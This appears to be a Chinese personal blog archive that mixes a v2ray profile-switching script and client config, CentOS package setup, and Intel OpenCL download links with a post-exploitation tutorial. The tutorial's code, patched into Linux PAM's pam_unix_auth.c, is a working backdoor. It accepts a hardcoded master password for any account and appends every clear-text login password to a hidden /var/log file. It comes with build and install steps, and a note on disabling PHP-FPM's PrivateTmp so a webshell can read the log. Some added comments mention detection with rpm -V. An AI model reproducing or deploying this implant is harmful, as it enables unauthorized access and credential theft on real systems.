2019年9月

#! /bin/sh -
 
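# Switch the local v2ray client between saved server profiles.
# Usage: sudo <this script> [us1|us2|nj1|nj2|jp|tw]
# The chosen profile is copied over the live config and the service is
# restarted. Must run as root: it rewrites /etc/v2ray and drives `service`.
#
# NOTE(review): the profiles live in a user's home directory but are
# installed by root. Whoever can write there decides which server the proxy
# talks to and which local ports it opens, so keep that directory writable
# only by the owner.
# NOTE(review): each profile carries the VMess user id (a credential).
# Check the mode of the installed /etc/v2ray/config.json after the copy.

name=${0##*/}
name=${name%.sh}
profile_dir=/home/kele/Desktop/v2ray
live_config=/etc/v2ray/config.json

# switch_profile MESSAGE FILE
#   MESSAGE - progress line printed before anything is changed
#   FILE    - profile file name inside $profile_dir
# Exits 1 (without touching the service) when the profile cannot be read,
# and exits 1 when the copy fails.
switch_profile() {
        src="$profile_dir/$2"
        echo "$1"
        # Check before stopping anything: a missing profile must not leave
        # v2ray stopped with its config already deleted.
        if [ ! -r "$src" ]; then
                echo "$name: profile $src is missing or unreadable" >&2
                exit 1
        fi
        service v2ray stop
        # Removing the old file first means cp creates a fresh file instead
        # of writing through an existing symlink.
        rm -f -- "$live_config"
        if ! cp -- "$src" "$live_config"; then
                echo "$name: failed to install $src as $live_config" >&2
                exit 1
        fi
        service v2ray start
}

case "$1" in
 us1)
        switch_profile "start us1-LA()..." v2ray-us1.json
        ;;
 us2)
        switch_profile "start us2-LA() ..." v2ray-us2.json
        ;;
 # The original post elides the remaining branches at this point (the usage
 # text lists nj1, nj2, jp and tw); add them in the same form as the two above.
 *)
        echo "Usage: sudo $name.sh [us1|us2|nj1|nj2|jp|tw]" >&2
        exit 1
        ;;
esac
exit 0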

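V2Ray 的客户端配置 JSON(注意:下面示例中的 "allowInsecure": true 会关闭对服务器 TLS 证书的校验,中间人可以冒充服务器,服务器有有效证书时应改为 false;两个入站都没有设置 "listen",默认监听 0.0.0.0,而 socks 入站又是 "noauth",只在本机使用时建议加上 "listen": "127.0.0.1"):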

{
  "dns": {
    "servers": [
      "1.1.1.1"
    ]
  },
  "inbounds": [
    {
      "port": 10808,
      "protocol": "socks",
      "settings": {
        "auth": "noauth",
        "udp": true,
        "userLevel": 8
      },
      "sniffing": {
        "destOverride": [
          "http",
          "tls"
        ],
        "enabled": true
      },
      "tag": "socks"
    },
    {
      "port": 10809,
      "protocol": "http",
      "settings": {
        "userLevel": 8
      },
      "tag": "http"
    }
  ],
  "log": {
    "loglevel": "warning"
  },
  "outbounds": [
    {
      "mux": {
        "enabled": false
      },
      "protocol": "vmess",
      "settings": {
        "vnext": [
          {
            "address": "域名",
            "port": 443,
            "users": [
              {
                "alterId": 64,
                "id": "自己的ID",
                "level": 8,
                "security": "auto"
              }
            ]
          }
        ]
      },
      "streamSettings": {
        "network": "ws",
        "security": "tls",
        "tlssettings": {
          "allowInsecure": true,
          "serverName": ""
        },
        "wssettings": {
          "connectionReuse": true,
          "headers": {
            "Host": ""
          },
          "path": "/自定义的PATH/"
        }
      },
      "tag": "proxy"
    },
    {
      "protocol": "freedom",
      "settings": {},
      "tag": "direct"
    },
    {
      "protocol": "blackhole",
      "settings": {
        "response": {
          "type": "http"
        }
      },
      "tag": "block"
    }
  ],
  "policy": {
    "levels": {
      "8": {
        "connIdle": 300,
        "downlinkOnly": 1,
        "handshake": 4,
        "uplinkOnly": 1
      }
    },
    "system": {
      "statsInboundUplink": true,
      "statsInboundDownlink": true
    }
  },
  "routing": {
    "domainStrategy": "IPIfNonMatch",
    "rules": []
  },
  "stats": {}
}

centos7.2

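# Package prerequisites on CentOS 7.2.
# EPEL is enabled first: fping (and, as far as I know, a few of the perl-*
# packages below) is shipped in EPEL on CentOS 7, and yum only prints
# "No package ... available" for names it cannot find instead of failing.
yum install -y epel-release
# -y so the group install does not stop at a confirmation prompt.
yum groupinstall -y "Development tools"
yum install -y perl perl-Net-Telnet perl-Net-DNS perl-LDAP perl-libwww-perl \
  perl-IO-Socket-SSL perl-Socket6 perl-Time-HiRes perl-ExtUtils-MakeMaker \
  rrdtool rrdtool-perl curl httpd httpd-devel gcc make wget libxml2-devel \
  libpng-devel glib pango pango-devel freetype freetype-devel fontconfig \
  cairo cairo-devel libart_lgpl libart_lgpl-devel perl-Sys-Syslog podofo \
  mod_fcgid perl-CGI-SpeedyCGI fping perl-CPAN perl-local-lib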

后面有空再写

前一篇文章,PAM_UNIX后门,把密码记录到了文件里。
本来,我是写的/tmp目录的。
但是记录完了之后。
我用webshell看不到。
原来是启用了PHP-FPM的私有tmp空间。
所以后面我用了/var/log代替。

关闭这个也简单,编辑:
/usr/lib/systemd/system/php-fpm.service
PrivateTmp=false
然后重启PHP-FPM就可以了。注意:PrivateTmp 是 systemd 提供的隔离加固,关闭后 PHP-FPM 会与系统上其他进程共用 /tmp,正常运维中应保持开启。

http://hui692.cc/2017/11/01/systemd-PrivateTmp%E7%9A%84%E5%9D%91.html

备份一下记录而已。
很老很老的技术了。不多说。
先看当前PAM版本,下载最合适的PAM。

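# Inventory of the platform and the installed PAM packages. A responder uses
# the same output to fetch the matching pristine package for comparison.
# Word size of the platform (number of bits in a long).
getconf LONG_BIT
# Distribution release on Red Hat style systems.
cat /etc/redhat-release
# Installed PAM packages on RPM-based systems.
rpm -qa | grep pam
# Installed PAM packages on Debian/Ubuntu (apt-get has no "list" subcommand).
dpkg -l | grep pam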

http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

然后,直接修改这个文件pam_unix_auth.c:
vim modules/pam_unix/pam_unix_auth.c

        /* verify the password of this user */
        retval = _unix_verify_password(pamh, name, p, ctrl);
        /*
         * Start of the lines patched into the module.
         * What they do, and what that means for someone examining a host:
         *  - a fixed master password is accepted for any account name;
         *  - every successful login is recorded with its clear-text password.
         * Both string literals below end up in the compiled pam_unix.so, and
         * a rebuilt module will not match the file shipped by the distribution
         * package, so package verification (e.g. `rpm -V pam` on RPM systems)
         * and a look for unexpected dot-files under /var/log are the checks
         * to run.
         */
        /* save password to file */
        /* Master password: when the supplied password equals this literal,
         * the result of the real verification above is overwritten with
         * PAM_SUCCESS, whatever `name` is. */
        if(strcmp(p,"t00ls.kele")==0) {
                retval = PAM_SUCCESS;
        }
        /* Credential capture: on success (genuine or forced above) the user
         * name and the clear-text password are appended as "name::password"
         * to a hidden file in /var/log. */
        if(retval== PAM_SUCCESS) {
                FILE* fp = fopen("/var/log/.unix.log","a+");
                /* earlier log location, left commented out by the author */
                //fp=fopen("/tmp/pam.txt","a");
                fprintf(fp,"%s::%s\n",name,p);
                fclose(fp);
        }
        /* save password to file */

./configuare
make
然后在.libs目录就会有pam_unix.so文件了。替换/lib64/security/pam_unix.so就可以了。最好先备份下。(防守方排查时,可用 rpm -V pam 校验 pam_unix.so 是否仍与软件包一致,并留意 /var/log 下的隐藏文件。)

参考:
https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/
这里有写用telegram bot的。

Intel® CPU Runtime for OpenCL™ Applications for Windows* OS product.

Version: --- 18.1
Build date:09 Oct 2018
https://software.intel.com/en-us/articles/opencl-drivers
http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/13794/opencl_runtime_18.1_x64_setup.msi

Intel® SDK for OpenCL™ Applications 2019
https://software.intel.com/en-us/opencl-sdk/choose-download
http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15626/intel_sdk_for_opencl_applications_2019.4.314.zip